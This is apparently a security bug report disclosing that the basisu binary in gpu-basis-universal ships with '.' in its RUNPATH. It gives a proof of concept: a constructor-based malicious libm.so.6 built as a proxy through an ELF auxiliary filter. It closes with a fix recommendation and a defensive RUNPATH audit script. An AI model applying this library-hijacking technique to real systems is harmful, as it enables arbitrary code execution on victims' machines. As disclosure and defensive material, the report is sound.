Package: gpu-basis-universal
Version: 2.0.2-4
Severity: important
Tags: security
*Summary:*
The gpu-basis-universal package installs the executable:
/usr/bin/basisu
This binary is built with the following RUNPATH:
RUNPATH [.]
Including the current working directory (".") in RUNPATH causes the dynamic
loader to include the process working directory in its library search path.
As a result, an attacker may be able to achieve arbitrary code execution by
placing a malicious shared library in a directory and inducing a victim to
execute basisu from that location.
This issue falls under CWE-427 (Uncontrolled Search Path Element).
*Impact:*
If a user executes basisu while their current working directory is
attacker-controlled (for example, a downloaded archive, extracted project,
shared workspace, mounted dataset, or /tmp directory), the dynamic loader
may resolve shared library dependencies from that directory.
An attacker who can place a malicious shared library in such a location may
be able to achieve arbitrary code execution in the security context of the
user running basisu.
Code execution occurs during dynamic library loading, prior to execution of
the program's main() function.
*Proof of Concept:*
*1. Verify the RUNPATH*
$ readelf -d /usr/bin/basisu | grep RUNPATH
Output:
0x000000000000001d (RUNPATH) Library runpath: [.]
*2. Create a Malicious Library*
$ mkdir -p /tmp/malicious_workspace
$ cd /tmp/malicious_workspace
$ cat << 'EOF' > poc_basisu.c
#include <stdio.h>
#include <stdlib.h>
__attribute__((constructor))
void exploit() {
    printf("\n[!!!] BASISU HIJACK SUCCESSFUL [!!!]\n");
    exit(0);
}
EOF
*3. Build a Proxy Library*
The binary expects symbols and version information from libm.so.6. To
satisfy those requirements while still obtaining code execution, a proxy
library can be constructed using the ELF auxiliary filter mechanism.
$ cat << 'EOF' > versions.map
GLIBC_2.17 { };
GLIBC_2.27 { };
GLIBC_2.29 { };
GLIBC_2.38 { };
EOF
$ gcc -shared -fPIC poc_basisu.c \
    -o libm.so.6 \
    -Wl,-f,/lib/aarch64-linux-gnu/libm.so.6 \
    -Wl,--version-script=versions.map
*4. Execute basisu*
$ cd /tmp/malicious_workspace
$ basisu
*Result:*
[!!!] BASISU HIJACK SUCCESSFUL [!!!]
The attacker-controlled libm.so.6 is loaded and its constructor executes
during dynamic linking.
*Additional Verification:*
Dynamic linker debugging confirms that the current working directory is
searched as a result of the embedded RUNPATH:
$ LD_DEBUG=libs basisu 2>&1 | grep -A 3 libm.so.6
*Example output:*
find library=libm.so.6 [0]; searching
search path=. (RUNPATH from file /usr/bin/basisu)
trying file=./libm.so.6
This demonstrates that the dynamic loader attempts to resolve libm.so.6
from the current working directory.
*Expected Fix:*
The package should not ship binaries containing "." in RUNPATH.
The RUNPATH entry should be removed or replaced with an explicit trusted
library path so that the current working directory is not searched during
dependency resolution.
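
A packaging-time check for the condition described above, as an added example that is not part of the original report or of the package: it generalizes the readelf step from the proof of concept to flag any RPATH/RUNPATH entry that is not anchored to an absolute path or $ORIGIN. The function names and the script name in the usage comment are hypothetical, and the handling of empty entries is an assumption stated in the comments.

```shell
#!/bin/sh
# Added example: report RPATH/RUNPATH entries that the loader resolves
# against the process working directory (CWE-427). Function names are
# hypothetical; they are not part of readelf or any Debian tool.

# Print every entry of a colon-separated search path that is not anchored:
# anything that does not start with "/" or $ORIGIN, such as "." or "lib".
# Empty entries are reported too, on the assumption that the loader
# treats them like ".".
unsafe_entries() {
    rest=$1
    while :; do
        entry=${rest%%:*}
        case $entry in
            /* | '$ORIGIN' | '$ORIGIN'/* | '${ORIGIN}' | '${ORIGIN}'/*) ;;
            '') echo '<empty>' ;;
            *) echo "$entry" ;;
        esac
        case $rest in
            *:*) rest=${rest#*:} ;;
            *) break ;;
        esac
    done
}

# Read `readelf -d` output on stdin and report unsafe entries for LABEL.
audit_dynamic() {
    label=$1
    sed -nE 's/.*\((RPATH|RUNPATH)\).*\[(.*)\].*/\2/p' |
    while IFS= read -r value; do
        unsafe_entries "$value" | while IFS= read -r e; do
            echo "$label: unsafe search path entry '$e' in [$value]"
        done
    done
}

# Audit every executable regular file directly inside directory $1.
scan_dir() {
    for f in "$1"/*; do
        [ -f "$f" ] && [ -x "$f" ] || continue
        readelf -d "$f" 2>/dev/null | audit_dynamic "$f"
    done
}

# Usage: sh audit-runpath.sh /usr/bin /usr/lib/games
for d in "$@"; do scan_dir "$d"; done
```

Run against a package's staged install tree before upload, any output line identifies a binary that needs its RUNPATH removed or replaced.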